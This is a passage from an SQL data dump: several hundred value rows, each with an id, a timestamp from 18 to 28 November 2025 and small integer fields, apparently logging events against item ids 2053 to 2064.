(22277, '2025-11-18 06:37:46', 1, 2060, 0, 1, 1),
(22278, '2025-11-18 07:34:52', 1, 2064, 0, 1, 1),
(22279, '2025-11-18 07:45:08', 1, 2063, 0, 1, 1),
(22280, '2025-11-18 09:29:33', 1, 2064, 0, 1, 1),
(22281, '2025-11-18 09:44:28', 1, 2061, 0, 1, 1),
(22282, '2025-11-18 10:05:36', 1, 2058, 0, 1, 1),
(22283, '2025-11-18 10:35:58', 1, 2064, 0, 1, 1),
(22284, '2025-11-18 11:04:26', 1, 2058, 0, 1, 1),
(22285, '2025-11-18 11:40:56', 1, 2054, 0, 1, 1),
(22286, '2025-11-18 12:07:47', 1, 2053, 0, 1, 1),
(22287, '2025-11-18 12:56:33', 1, 2064, 0, 1, 1),
(22288, '2025-11-18 13:48:30', 1, 2064, 0, 1, 1),
(22289, '2025-11-18 13:53:30', 1, 2060, 0, 1, 1),
(22290, '2025-11-18 14:55:44', 1, 2064, 0, 1, 1),
(22291, '2025-11-18 16:14:13', 1, 2055, 0, 1, 1),
(22292, '2025-11-18 16:23:24', 1, 2054, 0, 1, 1),
(22293, '2025-11-18 17:03:55', 1, 2055, 0, 1, 1),
(22294, '2025-11-18 17:43:55', 1, 2059, 0, 1, 1),
(22295, '2025-11-18 18:00:43', 1, 2054, 0, 1, 1),
(22296, '2025-11-18 18:39:15', 1, 2062, 0, 1, 1),
(22297, '2025-11-18 18:40:37', 1, 2064, 0, 1, 1),
(22298, '2025-11-18 18:54:47', 1, 2063, 0, 1, 1),
(22299, '2025-11-18 19:02:35', 1, 2060, 0, 1, 1),
(22300, '2025-11-18 19:46:57', 1, 2062, 0, 1, 1),
(22301, '2025-11-18 21:22:44', 1, 2054, 0, 1, 1),
(22302, '2025-11-18 22:21:27', 1, 2064, 0, 1, 1),
(22303, '2025-11-18 23:09:10', 1, 2061, 0, 1, 1),
(22304, '2025-11-19 01:30:20', 1, 2060, 0, 1, 1),
(22305, '2025-11-19 02:04:24', 1, 2058, 0, 1, 1),
(22306, '2025-11-19 02:04:25', 1, 2058, 0, 1, 1),
(22307, '2025-11-19 02:04:26', 1, 2058, 0, 1, 1),
(22308, '2025-11-19 02:04:26', 1, 2058, 0, 1, 1),
(22309, '2025-11-19 02:04:26', 1, 2058, 0, 1, 1),
(22310, '2025-11-19 02:04:26', 1, 2058, 0, 1, 1),
(22311, '2025-11-19 02:04:26', 1, 2058, 0, 1, 1),
(22312, '2025-11-19 02:04:29', 1, 2058, 0, 1, 1),
(22313, '2025-11-19 02:04:34', 1, 2058, 0, 1, 1),
(22314, '2025-11-19 02:04:36', 1, 2058, 0, 1, 1),
(22315, '2025-11-19 02:04:53', 1, 2058, 0, 1, 1),
(22316, '2025-11-19 02:14:04', 1, 2060, 0, 1, 1),
(22317, '2025-11-19 03:04:16', 1, 2058, 0, 1, 1),
(22318, '2025-11-19 03:04:21', 1, 2058, 0, 1, 1),
(22319, '2025-11-19 03:04:33', 1, 2058, 0, 1, 1),
(22320, '2025-11-19 03:05:50', 1, 2058, 0, 1, 1),
(22321, '2025-11-19 03:06:24', 1, 2058, 0, 1, 1),
(22322, '2025-11-19 03:09:34', 1, 2058, 0, 1, 1),
(22323, '2025-11-19 03:10:25', 1, 2058, 0, 1, 1),
(22324, '2025-11-19 03:49:12', 1, 2054, 0, 1, 1),
(22325, '2025-11-19 05:18:33', 1, 2064, 0, 1, 1),
(22326, '2025-11-19 06:28:53', 1, 2064, 0, 1, 1),
(22327, '2025-11-19 07:14:32', 1, 2064, 0, 1, 1),
(22328, '2025-11-19 11:44:00', 1, 2054, 0, 1, 1),
(22329, '2025-11-19 12:02:34', 1, 2058, 0, 1, 1),
(22330, '2025-11-19 12:02:34', 1, 2058, 0, 1, 1),
(22331, '2025-11-19 12:47:49', 1, 2054, 0, 1, 1),
(22332, '2025-11-19 13:10:55', 1, 2058, 0, 1, 1),
(22333, '2025-11-19 13:40:02', 1, 2064, 0, 1, 1),
(22334, '2025-11-19 14:15:30', 1, 2060, 0, 1, 1),
(22335, '2025-11-19 14:37:37', 1, 2063, 0, 1, 1),
(22336, '2025-11-19 15:06:39', 1, 2060, 0, 1, 1),
(22337, '2025-11-19 15:26:45', 1, 2064, 0, 1, 1),
(22338, '2025-11-19 15:38:57', 1, 2063, 0, 1, 1),
(22339, '2025-11-19 18:48:55', 1, 2054, 0, 1, 1),
(22340, '2025-11-19 19:19:23', 1, 2059, 0, 1, 1),
(22341, '2025-11-19 19:19:25', 1, 2054, 0, 1, 1),
(22342, '2025-11-19 19:19:26', 1, 2058, 0, 1, 1),
(22343, '2025-11-19 19:19:27', 1, 2064, 0, 1, 1),
(22344, '2025-11-19 19:19:29', 1, 2055, 0, 1, 1),
(22345, '2025-11-19 19:19:31', 1, 2060, 0, 1, 1),
(22346, '2025-11-19 19:19:35', 1, 2062, 0, 1, 1),
(22347, '2025-11-19 19:19:36', 1, 2063, 0, 1, 1),
(22348, '2025-11-19 20:01:15', 1, 2064, 0, 1, 1),
(22349, '2025-11-19 22:44:03', 1, 2062, 0, 1, 1),
(22350, '2025-11-19 23:44:40', 1, 2062, 0, 1, 1),
(22351, '2025-11-20 00:52:51', 1, 2062, 0, 1, 1),
(22352, '2025-11-20 01:44:30', 1, 2062, 0, 1, 1),
(22353, '2025-11-20 02:25:36', 1, 2058, 0, 1, 1),
(22354, '2025-11-20 02:44:34', 1, 2062, 0, 1, 1),
(22355, '2025-11-20 03:03:36', 1, 2062, 0, 1, 1),
(22356, '2025-11-20 03:03:41', 1, 2053, 0, 1, 1),
(22357, '2025-11-20 03:05:03', 1, 2062, 0, 1, 1),
(22358, '2025-11-20 03:35:42', 1, 2055, 0, 1, 1),
(22359, '2025-11-20 04:14:40', 1, 2062, 0, 1, 1),
(22360, '2025-11-20 04:24:54', 1, 2060, 0, 1, 1),
(22361, '2025-11-20 04:41:22', 1, 2060, 0, 1, 1),
(22362, '2025-11-20 05:08:32', 1, 2054, 0, 1, 1),
(22363, '2025-11-20 05:15:48', 1, 2062, 0, 1, 1),
(22364, '2025-11-20 05:17:48', 1, 2062, 0, 1, 1),
(22365, '2025-11-20 05:38:50', 1, 2061, 0, 1, 1),
(22366, '2025-11-20 05:41:35', 1, 2054, 0, 1, 1),
(22367, '2025-11-20 06:06:12', 1, 2061, 0, 1, 1),
(22368, '2025-11-20 06:08:10', 1, 2062, 0, 1, 1),
(22369, '2025-11-20 06:41:52', 1, 2062, 0, 1, 1),
(22370, '2025-11-20 06:42:29', 1, 2061, 0, 1, 1),
(22371, '2025-11-20 07:08:46', 1, 2061, 0, 1, 1),
(22372, '2025-11-20 07:17:32', 1, 2062, 0, 1, 1),
(22373, '2025-11-20 07:17:35', 1, 2061, 0, 1, 1),
(22374, '2025-11-20 07:36:35', 1, 2064, 0, 1, 1),
(22375, '2025-11-20 07:51:05', 1, 2064, 0, 1, 1),
(22376, '2025-11-20 08:21:53', 1, 2062, 0, 1, 1),
(22377, '2025-11-20 08:24:08', 1, 2061, 0, 1, 1),
(22378, '2025-11-20 08:43:08', 1, 2063, 0, 1, 1),
(22379, '2025-11-20 08:48:36', 1, 2054, 0, 1, 1),
(22380, '2025-11-20 08:56:21', 1, 2061, 0, 1, 1),
(22381, '2025-11-20 08:56:22', 1, 2062, 0, 1, 1),
(22382, '2025-11-20 09:30:44', 1, 2062, 0, 1, 1),
(22383, '2025-11-20 09:31:14', 1, 2061, 0, 1, 1),
(22384, '2025-11-20 09:58:04', 1, 2062, 0, 1, 1),
(22385, '2025-11-20 10:05:17', 1, 2061, 0, 1, 1),
(22386, '2025-11-20 10:05:23', 1, 2062, 0, 1, 1),
(22387, '2025-11-20 10:40:45', 1, 2060, 0, 1, 1),
(22388, '2025-11-20 11:03:52', 1, 2062, 0, 1, 1),
(22389, '2025-11-20 11:24:04', 1, 2059, 0, 1, 1),
(22390, '2025-11-20 13:45:34', 1, 2062, 0, 1, 1),
(22391, '2025-11-20 14:00:02', 1, 2062, 0, 1, 1),
(22392, '2025-11-20 14:26:20', 1, 2062, 0, 1, 1),
(22393, '2025-11-20 14:38:29', 1, 2064, 0, 1, 1),
(22394, '2025-11-20 14:39:31', 1, 2063, 0, 1, 1),
(22395, '2025-11-20 14:45:22', 1, 2058, 0, 1, 1),
(22396, '2025-11-20 14:46:26', 1, 2064, 0, 1, 1),
(22397, '2025-11-20 15:12:10', 1, 2055, 0, 1, 1),
(22398, '2025-11-20 15:15:39', 1, 2064, 0, 1, 1),
(22399, '2025-11-20 15:20:36', 1, 2062, 0, 1, 1),
(22400, '2025-11-20 15:22:31', 1, 2062, 0, 1, 1),
(22401, '2025-11-20 15:25:35', 1, 2060, 0, 1, 1),
(22402, '2025-11-20 15:40:22', 1, 2061, 0, 1, 1),
(22403, '2025-11-20 15:41:01', 1, 2064, 0, 1, 1),
(22404, '2025-11-20 15:45:25', 1, 2058, 0, 1, 1),
(22405, '2025-11-20 15:51:25', 1, 2064, 0, 1, 1),
(22406, '2025-11-20 16:14:33', 1, 2062, 0, 1, 1),
(22407, '2025-11-20 16:16:52', 1, 2062, 0, 1, 1),
(22408, '2025-11-20 16:41:13', 1, 2064, 0, 1, 1),
(22409, '2025-11-20 17:08:08', 1, 2054, 0, 1, 1),
(22410, '2025-11-20 17:35:26', 1, 2064, 0, 1, 1),
(22411, '2025-11-20 17:35:40', 1, 2059, 0, 1, 1),
(22412, '2025-11-20 17:37:00', 1, 2064, 0, 1, 1),
(22413, '2025-11-20 17:51:06', 1, 2059, 0, 1, 1),
(22414, '2025-11-20 19:51:53', 1, 2058, 0, 1, 1),
(22415, '2025-11-20 22:46:40', 1, 2063, 0, 1, 1),
(22416, '2025-11-20 22:46:44', 1, 2061, 0, 1, 1),
(22417, '2025-11-20 22:46:48', 1, 2062, 0, 1, 1),
(22418, '2025-11-21 00:24:03', 1, 2053, 0, 1, 1),
(22419, '2025-11-21 02:23:13', 1, 2054, 0, 1, 1),
(22420, '2025-11-21 05:15:35', 1, 2064, 0, 1, 1),
(22421, '2025-11-21 06:19:10', 1, 2060, 0, 1, 1),
(22422, '2025-11-21 09:53:21', 1, 2054, 0, 1, 1),
(22423, '2025-11-21 14:04:00', 1, 2064, 0, 1, 1),
(22424, '2025-11-21 15:22:59', 1, 2064, 0, 1, 1),
(22425, '2025-11-21 15:32:37', 1, 2058, 0, 1, 1),
(22426, '2025-11-21 17:48:28', 1, 2064, 0, 1, 1),
(22427, '2025-11-21 18:02:26', 1, 2062, 0, 1, 1),
(22428, '2025-11-21 18:03:45', 1, 2064, 0, 1, 1),
(22429, '2025-11-21 18:09:58', 1, 2054, 0, 1, 1),
(22430, '2025-11-21 19:29:39', 1, 2054, 0, 1, 1),
(22431, '2025-11-21 20:20:19', 1, 2060, 0, 1, 1),
(22432, '2025-11-21 20:32:52', 1, 2060, 0, 1, 1),
(22433, '2025-11-21 21:51:33', 1, 2064, 0, 1, 1),
(22434, '2025-11-21 23:55:13', 1, 2054, 0, 1, 1),
(22435, '2025-11-22 02:09:04', 1, 2055, 0, 1, 1),
(22436, '2025-11-22 04:26:20', 1, 2058, 0, 1, 1),
(22437, '2025-11-22 06:00:30', 1, 2064, 0, 1, 1),
(22438, '2025-11-22 07:26:59', 1, 2063, 0, 1, 1),
(22439, '2025-11-22 08:27:50', 1, 2054, 0, 1, 1),
(22440, '2025-11-22 08:39:50', 1, 2058, 0, 1, 1),
(22441, '2025-11-22 09:30:47', 1, 2060, 0, 1, 1),
(22442, '2025-11-22 11:50:46', 1, 2055, 0, 1, 1),
(22443, '2025-11-22 14:46:51', 1, 2063, 0, 1, 1),
(22444, '2025-11-22 14:59:11', 1, 2062, 0, 1, 1),
(22445, '2025-11-22 15:20:43', 1, 2064, 0, 1, 1),
(22446, '2025-11-22 15:24:28', 1, 2064, 0, 1, 1),
(22447, '2025-11-22 15:45:48', 1, 2055, 0, 1, 1),
(22448, '2025-11-22 17:07:53', 1, 2064, 0, 1, 1),
(22449, '2025-11-22 17:32:34', 1, 2061, 0, 1, 1),
(22450, '2025-11-22 17:42:27', 1, 2058, 0, 1, 1),
(22451, '2025-11-22 17:44:17', 1, 2054, 0, 1, 1),
(22452, '2025-11-22 18:57:22', 1, 2058, 0, 1, 1),
(22453, '2025-11-22 19:53:24', 1, 2064, 0, 1, 1),
(22454, '2025-11-22 20:20:03', 1, 2060, 0, 1, 1),
(22455, '2025-11-22 21:43:15', 1, 2054, 0, 1, 1),
(22456, '2025-11-22 22:04:21', 1, 2060, 0, 1, 1),
(22457, '2025-11-22 23:02:59', 1, 2054, 0, 1, 1),
(22458, '2025-11-23 04:38:10', 1, 2064, 0, 1, 1),
(22459, '2025-11-23 05:30:43', 1, 2060, 0, 1, 1),
(22460, '2025-11-23 06:54:54', 1, 2054, 0, 1, 1),
(22461, '2025-11-23 06:59:01', 1, 2060, 0, 1, 1),
(22462, '2025-11-23 06:59:11', 1, 2059, 0, 1, 1),
(22463, '2025-11-23 09:32:33', 1, 2054, 0, 1, 1),
(22464, '2025-11-23 09:41:25', 1, 2064, 0, 1, 1),
(22465, '2025-11-23 10:38:13', 1, 2064, 0, 1, 1),
(22466, '2025-11-23 11:04:38', 1, 2064, 0, 1, 1),
(22467, '2025-11-23 11:14:20', 1, 2063, 0, 1, 1),
(22468, '2025-11-23 12:34:13', 1, 2062, 0, 1, 1),
(22469, '2025-11-23 12:43:53', 1, 2064, 0, 1, 1),
(22470, '2025-11-23 13:37:19', 1, 2064, 0, 1, 1),
(22471, '2025-11-23 13:43:23', 1, 2059, 0, 1, 1),
(22472, '2025-11-23 14:27:44', 1, 2054, 0, 1, 1),
(22473, '2025-11-23 18:13:32', 1, 2064, 0, 1, 1),
(22474, '2025-11-23 18:20:34', 1, 2064, 0, 1, 1),
(22475, '2025-11-23 18:21:01', 1, 2062, 0, 1, 1),
(22476, '2025-11-23 18:25:54', 1, 2054, 0, 1, 1),
(22477, '2025-11-23 18:35:27', 1, 2062, 0, 1, 1),
(22478, '2025-11-23 18:40:08', 1, 2063, 0, 1, 1),
(22479, '2025-11-23 18:53:25', 1, 2060, 0, 1, 1),
(22480, '2025-11-23 19:25:06', 1, 2054, 0, 1, 1),
(22481, '2025-11-23 19:32:54', 1, 2060, 0, 1, 1),
(22482, '2025-11-23 20:30:28', 1, 2058, 0, 1, 1),
(22483, '2025-11-23 23:57:43', 1, 2060, 0, 1, 1),
(22484, '2025-11-24 00:10:28', 1, 2054, 0, 1, 1),
(22485, '2025-11-24 00:48:21', 1, 2064, 0, 1, 1),
(22486, '2025-11-24 00:48:22', 1, 2064, 0, 1, 1),
(22487, '2025-11-24 01:01:52', 1, 2064, 0, 1, 1),
(22488, '2025-11-24 02:27:52', 1, 2064, 0, 1, 1),
(22489, '2025-11-24 02:58:16', 1, 2055, 0, 1, 1),
(22490, '2025-11-24 03:10:26', 1, 2055, 0, 1, 1),
(22491, '2025-11-24 03:19:56', 1, 2054, 0, 1, 1),
(22492, '2025-11-24 04:04:07', 1, 2063, 0, 1, 1),
(22493, '2025-11-24 04:16:32', 1, 2061, 0, 1, 1),
(22494, '2025-11-24 04:16:33', 1, 2061, 0, 1, 1),
(22495, '2025-11-24 04:26:37', 1, 2061, 0, 1, 1),
(22496, '2025-11-24 04:27:14', 1, 2059, 0, 1, 1),
(22497, '2025-11-24 06:17:21', 1, 2053, 0, 1, 1),
(22498, '2025-11-24 06:23:00', 1, 2058, 0, 1, 1),
(22499, '2025-11-24 07:17:29', 1, 2054, 0, 1, 1),
(22500, '2025-11-24 07:18:00', 1, 2060, 0, 1, 1),
(22501, '2025-11-24 09:19:16', 1, 2064, 0, 1, 1),
(22502, '2025-11-24 10:00:03', 1, 2064, 0, 1, 1),
(22503, '2025-11-24 10:54:01', 1, 2064, 0, 1, 1),
(22504, '2025-11-24 10:59:03', 1, 2054, 0, 1, 1),
(22505, '2025-11-24 18:00:35', 1, 2062, 0, 1, 1),
(22506, '2025-11-24 18:11:01', 1, 2054, 0, 1, 1),
(22507, '2025-11-24 19:02:11', 1, 2060, 0, 1, 1),
(22508, '2025-11-24 19:06:16', 1, 2062, 0, 1, 1),
(22509, '2025-11-24 19:07:32', 1, 2064, 0, 1, 1),
(22510, '2025-11-24 19:47:31', 1, 2054, 0, 1, 1),
(22511, '2025-11-24 19:47:36', 1, 2058, 0, 1, 1),
(22512, '2025-11-24 20:00:01', 1, 2061, 0, 1, 1),
(22513, '2025-11-24 20:00:05', 1, 2059, 0, 1, 1),
(22514, '2025-11-24 20:00:10', 1, 2061, 0, 1, 1),
(22515, '2025-11-24 20:00:14', 1, 2055, 0, 1, 1),
(22516, '2025-11-24 20:00:14', 1, 2059, 0, 1, 1),
(22517, '2025-11-24 20:00:14', 1, 2062, 0, 1, 1),
(22518, '2025-11-24 20:00:17', 1, 2059, 0, 1, 1),
(22519, '2025-11-24 20:00:18', 1, 2064, 0, 1, 1),
(22520, '2025-11-24 20:00:18', 1, 2064, 0, 1, 1),
(22521, '2025-11-24 20:00:20', 1, 2063, 0, 1, 1),
(22522, '2025-11-24 20:00:20', 1, 2061, 0, 1, 1),
(22523, '2025-11-24 20:00:20', 1, 2061, 0, 1, 1),
(22524, '2025-11-24 20:00:21', 1, 2061, 0, 1, 1),
(22525, '2025-11-24 20:00:21', 1, 2061, 0, 1, 1),
(22526, '2025-11-24 20:00:21', 1, 2061, 0, 1, 1),
(22527, '2025-11-24 20:00:21', 1, 2061, 0, 1, 1),
(22528, '2025-11-24 20:00:21', 1, 2061, 0, 1, 1),
(22529, '2025-11-24 20:00:25', 1, 2055, 0, 1, 1),
(22530, '2025-11-24 20:00:26', 1, 2063, 0, 1, 1),
(22531, '2025-11-24 20:00:27', 1, 2061, 0, 1, 1),
(22532, '2025-11-24 20:00:27', 1, 2061, 0, 1, 1),
(22533, '2025-11-24 20:00:27', 1, 2061, 0, 1, 1),
(22534, '2025-11-24 20:00:27', 1, 2061, 0, 1, 1),
(22535, '2025-11-24 20:00:27', 1, 2061, 0, 1, 1),
(22536, '2025-11-24 20:00:27', 1, 2061, 0, 1, 1),
(22537, '2025-11-24 20:00:28', 1, 2061, 0, 1, 1),
(22538, '2025-11-24 20:00:28', 1, 2062, 0, 1, 1),
(22539, '2025-11-24 20:00:29', 1, 2062, 0, 1, 1),
(22540, '2025-11-24 20:00:29', 1, 2062, 0, 1, 1),
(22541, '2025-11-24 20:00:29', 1, 2062, 0, 1, 1),
(22542, '2025-11-24 20:00:29', 1, 2062, 0, 1, 1),
(22543, '2025-11-24 20:00:29', 1, 2062, 0, 1, 1),
(22544, '2025-11-24 20:00:29', 1, 2062, 0, 1, 1),
(22545, '2025-11-24 20:00:30', 1, 2058, 0, 1, 1),
(22546, '2025-11-24 20:00:30', 1, 2062, 0, 1, 1),
(22547, '2025-11-24 20:00:39', 1, 2064, 0, 1, 1),
(22548, '2025-11-24 20:00:41', 1, 2060, 0, 1, 1),
(22549, '2025-11-24 20:00:42', 1, 2064, 0, 1, 1),
(22550, '2025-11-24 20:00:43', 1, 2064, 0, 1, 1),
(22551, '2025-11-24 20:00:43', 1, 2054, 0, 1, 1),
(22552, '2025-11-24 20:00:45', 1, 2064, 0, 1, 1),
(22553, '2025-11-24 20:00:47', 1, 2062, 0, 1, 1),
(22554, '2025-11-24 20:00:47', 1, 2058, 0, 1, 1),
(22555, '2025-11-24 20:00:47', 1, 2062, 0, 1, 1),
(22556, '2025-11-24 20:00:47', 1, 2062, 0, 1, 1),
(22557, '2025-11-24 20:00:48', 1, 2064, 0, 1, 1),
(22558, '2025-11-24 20:00:48', 1, 2060, 0, 1, 1),
(22559, '2025-11-24 20:00:49', 1, 2054, 0, 1, 1),
(22560, '2025-11-24 20:00:55', 1, 2062, 0, 1, 1),
(22561, '2025-11-24 20:00:56', 1, 2062, 0, 1, 1),
(22562, '2025-11-24 20:00:56', 1, 2062, 0, 1, 1),
(22563, '2025-11-24 21:27:42', 1, 2054, 0, 1, 1),
(22564, '2025-11-24 21:54:42', 1, 2061, 0, 1, 1),
(22565, '2025-11-24 23:24:11', 1, 2064, 0, 1, 1),
(22566, '2025-11-24 23:36:06', 1, 2064, 0, 1, 1),
(22567, '2025-11-25 00:37:24', 1, 2064, 0, 1, 1),
(22568, '2025-11-25 01:35:00', 1, 2060, 0, 1, 1),
(22569, '2025-11-25 01:56:35', 1, 2053, 0, 1, 1),
(22570, '2025-11-25 06:11:44', 1, 2059, 0, 1, 1),
(22571, '2025-11-25 07:15:47', 1, 2059, 0, 1, 1),
(22572, '2025-11-25 10:18:18', 1, 2060, 0, 1, 1),
(22573, '2025-11-25 10:46:27', 1, 2054, 0, 1, 1),
(22574, '2025-11-25 11:04:01', 1, 2054, 0, 1, 1),
(22575, '2025-11-25 11:05:17', 1, 2060, 0, 1, 1),
(22576, '2025-11-25 11:43:40', 1, 2060, 0, 1, 1),
(22577, '2025-11-25 11:44:19', 1, 2054, 0, 1, 1),
(22578, '2025-11-25 11:44:39', 1, 2059, 0, 1, 1),
(22579, '2025-11-25 11:44:50', 1, 2064, 0, 1, 1),
(22580, '2025-11-25 13:28:26', 1, 2064, 0, 1, 1),
(22581, '2025-11-25 14:02:08', 1, 2060, 0, 1, 1),
(22582, '2025-11-25 16:16:58', 1, 2054, 0, 1, 1),
(22583, '2025-11-25 18:00:29', 1, 2064, 0, 1, 1),
(22584, '2025-11-25 19:16:49', 1, 2054, 0, 1, 1),
(22585, '2025-11-25 19:28:16', 1, 2064, 0, 1, 1),
(22586, '2025-11-25 20:14:25', 1, 2064, 0, 1, 1),
(22587, '2025-11-25 23:44:45', 1, 2060, 0, 1, 1),
(22588, '2025-11-26 00:40:34', 1, 2063, 0, 1, 1),
(22589, '2025-11-26 01:16:52', 1, 2054, 0, 1, 1),
(22590, '2025-11-26 03:47:46', 1, 2060, 0, 1, 1),
(22591, '2025-11-26 03:54:14', 1, 2064, 0, 1, 1),
(22592, '2025-11-26 07:12:28', 1, 2061, 0, 1, 1),
(22593, '2025-11-26 08:49:11', 1, 2053, 0, 1, 1),
(22594, '2025-11-26 09:16:19', 1, 2059, 0, 1, 1),
(22595, '2025-11-26 09:30:49', 1, 2058, 0, 1, 1),
(22596, '2025-11-26 14:45:27', 1, 2064, 0, 1, 1),
(22597, '2025-11-26 15:20:34', 1, 2060, 0, 1, 1),
(22598, '2025-11-26 15:47:57', 1, 2054, 0, 1, 1),
(22599, '2025-11-26 16:06:38', 1, 2054, 0, 1, 1),
(22600, '2025-11-26 16:41:45', 1, 2064, 0, 1, 1),
(22601, '2025-11-26 17:47:05', 1, 2060, 0, 1, 1),
(22602, '2025-11-26 17:50:29', 1, 2060, 0, 1, 1),
(22603, '2025-11-26 18:13:06', 1, 2059, 0, 1, 1),
(22604, '2025-11-26 21:29:48', 1, 2064, 0, 1, 1),
(22605, '2025-11-26 22:06:27', 1, 2058, 0, 1, 1),
(22606, '2025-11-26 23:21:19', 1, 2064, 0, 1, 1),
(22607, '2025-11-27 02:07:10', 1, 2058, 0, 1, 1),
(22608, '2025-11-27 02:31:20', 1, 2060, 0, 1, 1),
(22609, '2025-11-27 04:42:23', 1, 2061, 0, 1, 1),
(22610, '2025-11-27 05:04:50', 1, 2054, 0, 1, 1),
(22611, '2025-11-27 06:59:08', 1, 2060, 0, 1, 1),
(22612, '2025-11-27 08:35:35', 1, 2054, 0, 1, 1),
(22613, '2025-11-27 10:07:09', 1, 2064, 0, 1, 1),
(22614, '2025-11-27 10:07:09', 1, 2063, 0, 1, 1),
(22615, '2025-11-27 10:07:12', 1, 2061, 0, 1, 1),
(22616, '2025-11-27 10:07:12', 1, 2062, 0, 1, 1),
(22617, '2025-11-27 10:07:12', 1, 2060, 0, 1, 1),
(22618, '2025-11-27 10:07:12', 1, 2059, 0, 1, 1),
(22619, '2025-11-27 10:07:13', 1, 2055, 0, 1, 1),
(22620, '2025-11-27 10:07:13', 1, 2058, 0, 1, 1),
(22621, '2025-11-27 10:07:13', 1, 2054, 0, 1, 1),
(22622, '2025-11-27 10:45:38', 1, 2058, 0, 1, 1),
(22623, '2025-11-27 10:45:53', 1, 2058, 0, 1, 1),
(22624, '2025-11-27 15:44:36', 1, 2064, 0, 1, 1),
(22625, '2025-11-27 15:55:52', 1, 2064, 0, 1, 1),
(22626, '2025-11-27 16:42:06', 1, 2064, 0, 1, 1),
(22627, '2025-11-27 16:55:22', 1, 2060, 0, 1, 1),
(22628, '2025-11-27 16:58:10', 1, 2062, 0, 1, 1),
(22629, '2025-11-27 16:59:29', 1, 2063, 0, 1, 1),
(22630, '2025-11-27 16:59:39', 1, 2064, 0, 1, 1),
(22631, '2025-11-27 17:10:10', 1, 2058, 0, 1, 1),
(22632, '2025-11-27 17:39:39', 1, 2055, 0, 1, 1),
(22633, '2025-11-27 18:14:20', 1, 2058, 0, 1, 1),
(22634, '2025-11-27 18:14:33', 1, 2064, 0, 1, 1),
(22635, '2025-11-27 18:14:54', 1, 2062, 0, 1, 1),
(22636, '2025-11-27 18:14:57', 1, 2055, 0, 1, 1),
(22637, '2025-11-27 18:15:07', 1, 2059, 0, 1, 1),
(22638, '2025-11-27 18:15:09', 1, 2063, 0, 1, 1),
(22639, '2025-11-27 18:15:13', 1, 2061, 0, 1, 1),
(22640, '2025-11-27 18:15:20', 1, 2060, 0, 1, 1),
(22641, '2025-11-27 18:15:29', 1, 2054, 0, 1, 1),
(22642, '2025-11-27 18:16:03', 1, 2058, 0, 1, 1),
(22643, '2025-11-27 18:16:43', 1, 2054, 0, 1, 1),
(22644, '2025-11-27 18:16:48', 1, 2064, 0, 1, 1),
(22645, '2025-11-27 18:17:08', 1, 2062, 0, 1, 1),
(22646, '2025-11-27 18:17:12', 1, 2055, 0, 1, 1),
(22647, '2025-11-27 18:17:32', 1, 2059, 0, 1, 1),
(22648, '2025-11-27 18:17:44', 1, 2063, 0, 1, 1),
(22649, '2025-11-27 18:17:48', 1, 2060, 0, 1, 1),
(22650, '2025-11-27 18:17:54', 1, 2061, 0, 1, 1),
(22651, '2025-11-27 18:18:10', 1, 2053, 0, 1, 1),
(22652, '2025-11-27 18:18:47', 1, 2061, 0, 1, 1),
(22653, '2025-11-27 18:24:16', 1, 2064, 0, 1, 1),
(22654, '2025-11-27 18:38:38', 1, 2062, 0, 1, 1),
(22655, '2025-11-27 19:09:45', 1, 2054, 0, 1, 1),
(22656, '2025-11-27 19:12:30', 1, 2054, 0, 1, 1),
(22657, '2025-11-27 19:18:02', 1, 2059, 0, 1, 1),
(22658, '2025-11-27 19:22:37', 1, 2064, 0, 1, 1),
(22659, '2025-11-27 19:34:13', 1, 2061, 0, 1, 1),
(22660, '2025-11-27 19:47:36', 1, 2061, 0, 1, 1),
(22661, '2025-11-27 19:56:27', 1, 2058, 0, 1, 1),
(22662, '2025-11-27 20:28:24', 1, 2062, 0, 1, 1),
(22663, '2025-11-27 20:37:02', 1, 2054, 0, 1, 1),
(22664, '2025-11-27 20:45:37', 1, 2060, 0, 1, 1),
(22665, '2025-11-27 20:49:28', 1, 2063, 0, 1, 1),
(22666, '2025-11-27 20:59:08', 1, 2058, 0, 1, 1),
(22667, '2025-11-27 21:27:01', 1, 2055, 0, 1, 1),
(22668, '2025-11-27 21:32:31', 1, 2060, 0, 1, 1),
(22669, '2025-11-27 22:03:19', 1, 2061, 0, 1, 1),
(22670, '2025-11-27 22:22:10', 1, 2062, 0, 1, 1),
(22671, '2025-11-27 22:54:48', 1, 2054, 0, 1, 1),
(22672, '2025-11-27 22:59:59', 1, 2059, 0, 1, 1),
(22673, '2025-11-27 23:02:08', 1, 2062, 0, 1, 1),
(22674, '2025-11-27 23:02:12', 1, 2061, 0, 1, 1),
(22675, '2025-11-27 23:02:16', 1, 2063, 0, 1, 1),
(22676, '2025-11-27 23:04:30', 1, 2064, 0, 1, 1),
(22677, '2025-11-27 23:20:26', 1, 2060, 0, 1, 1),
(22678, '2025-11-27 23:24:50', 1, 2063, 0, 1, 1),
(22679, '2025-11-27 23:36:01', 1, 2058, 0, 1, 1),
(22680, '2025-11-28 00:07:07', 1, 2055, 0, 1, 1),
(22681, '2025-11-28 00:48:36', 1, 2061, 0, 1, 1),
(22682, '2025-11-28 01:10:20', 1, 2062, 0, 1, 1),
(22683, '2025-11-28 01:38:35', 1, 2054, 0, 1, 1),
(22684, '2025-11-28 01:47:16', 1, 2054, 0, 1, 1),
(22685, '2025-11-28 01:53:31', 1, 2059, 0, 1, 1),
(22686, '2025-11-28 01:58:37', 1, 2064, 0, 1, 1),
(22687, '2025-11-28 03:39:28', 1, 2060, 0, 1, 1),
(22688, '2025-11-28 03:49:31', 1, 2061, 0, 1, 1),
(22689, '2025-11-28 05:13:36', 1, 2064, 0, 1, 1),
(22690, '2025-11-28 06:12:39', 1, 2061, 0, 1, 1),
(22691, '2025-11-28 06:16:24', 1, 2060, 0, 1, 1),
(22692, '2025-11-28 06:49:18', 1, 2063, 0, 1, 1),
(22693, '2025-11-28 07:16:33', 1, 2055, 0, 1, 1),
(22694, '2025-11-28 07:28:42', 1, 2064, 0, 1, 1),
(22695, '2025-11-28 07:31:25', 1, 2062, 0, 1, 1),
(22696, '2025-11-28 09:04:40', 1, 2058, 0, 1, 1),
(22697, '2025-11-28 09:06:42', 1, 2060, 0, 1, 1),
(22698, '2025-11-28 09:07:51', 1, 2064, 0, 1, 1),
(22699, '2025-11-28 09:16:22', 1, 2064, 0, 1, 1),
(22700, '2025-11-28 09:24:29', 1, 2064, 0, 1, 1),
(22701, '2025-11-28 09:36:35', 1, 2060, 0, 1, 1),
(22702, '2025-11-28 10:16:16', 1, 2063, 0, 1, 1),
(22703, '2025-11-28 10:49:34', 1, 2054, 0, 1, 1),
(22704, '2025-11-28 11:13:32', 1, 2064, 0, 1, 1),
